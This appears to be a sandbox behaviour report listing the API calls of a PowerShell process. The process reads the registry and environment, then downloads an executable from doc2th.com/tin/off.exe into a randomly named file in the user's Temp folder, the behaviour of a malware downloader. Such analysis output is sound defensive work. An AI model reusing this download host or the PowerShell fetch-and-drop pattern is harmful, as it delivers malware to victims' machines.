| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
21 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, type = file_type |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = doc2th.com, address_out = 192.232.251.15 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 192.232.251.15, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 71, size_out = 71 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = doc2th.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /tin/off.exe |
|
1 | |
| Inet | Send HTTP Request | headers = host: doc2th.com, connection: Keep-Alive, url = doc2th.com/tin/off.exe |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 4096 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 8972 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 8972 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 8738 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3752 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 3508 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 3508 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 23232 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 23232 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 22300 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 7260 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 7260 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 7260 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 2904 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 2904 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 20328 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 20328 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 17012 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 5808 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 5808 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 5808 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 1452 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 4356 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 4356 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 65536, size_out = 17424 |
|
1 | |
| Inet | Read Response | size = 65536, size_out = 17424 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\lambdoidtegument.exe, size = 15040 |
|
1 | |
